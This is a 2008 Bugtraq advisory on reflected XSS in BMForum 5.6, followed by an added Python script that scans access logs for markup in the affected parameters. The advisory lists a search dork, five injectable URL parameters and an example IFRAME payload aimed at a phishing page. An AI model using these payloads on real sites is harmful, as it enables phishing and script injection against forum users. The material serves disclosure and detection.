Date: 22 May 2008 13:12:21 -0000
From: tan_prathan@...mail.com
To: bugtraq@...urityfocus.com
Subject: BMForum Remote 5.6 Multiple XSS Vulnerability

==========================================================
      BMForum Remote 5.6 Multiple XSS Vulnerability
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : 5.6 (Latest Version)
 VENDOR      : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---
 Particularly dangerous because an 'IFRAME' tag can be injected, which makes the reflected page usable for phishing.
 
 Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
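As an added defender's example (not part of the advisory), the following Python script scans web server access log entries in the common log format for the five parameters listed above carrying HTML markup. The log lines and the phisherpage.example host are constructed for the demonstration, and parameter values are URL-decoded a second time to catch double-encoded payloads.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script name -> query parameters the advisory reports as reflected unescaped
VULNERABLE_PARAMS = {
    "index.php": {"outpused"},
    "bsd01footer.php": {"footer_copyright", "verandproname"},
    "bsd01header.php": {"topads", "myplugin"},
}

# An opening/closing tag or a javascript: URL has no business in these parameters
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.IGNORECASE)

# Apache/nginx common log format: client, timestamp, request line, status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')

# Constructed sample entries (not real traffic); hosts use reserved example space
SAMPLE_LOG = [
    '203.0.113.5 - - [22/May/2008:13:12:21 +0000] "GET /forum/index.php?outpused=%3CIFRAME%20src%3Dhttp%3A%2F%2Fphisherpage.example%20width%3D%22900%22%3E HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/May/2008:13:13:02 +0000] "GET /forum/index.php?outpused=hello HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/May/2008:13:14:40 +0000] "GET /forum/newtem/header/bsd01header.php?topads=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 812',
    '198.51.100.7 - - [22/May/2008:13:15:01 +0000] "GET /forum/viewthread.php?tid=%3Cb%3E HTTP/1.1" 200 900',
]

def check_request(target):
    """Return (param, decoded_value) pairs where a watched parameter carries markup."""
    parts = urlsplit(target)
    watched = VULNERABLE_PARAMS.get(parts.path.rsplit("/", 1)[-1])
    if not watched:
        return []
    hits = []
    # parse_qs decodes once; decode again to catch double-encoded payloads (%253C -> %3C -> <)
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in watched:
            for value in values:
                decoded = unquote(value)
                if MARKUP_RE.search(decoded):
                    hits.append((name, decoded))
    return hits

def scan_log(lines):
    """Return (client_ip, script_path, param, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for param, value in check_request(m.group("target")):
                findings.append((m.group("ip"), urlsplit(m.group("target")).path, param, value))
    return findings
```

Feed scan_log the lines of a real access log to list which clients sent markup to the affected parameters; on the sample above it reports the IFRAME injection against index.php and the double-encoded script tag against bsd01header.php, and ignores the benign request and the unrelated viewthread.php parameter.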

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################
 
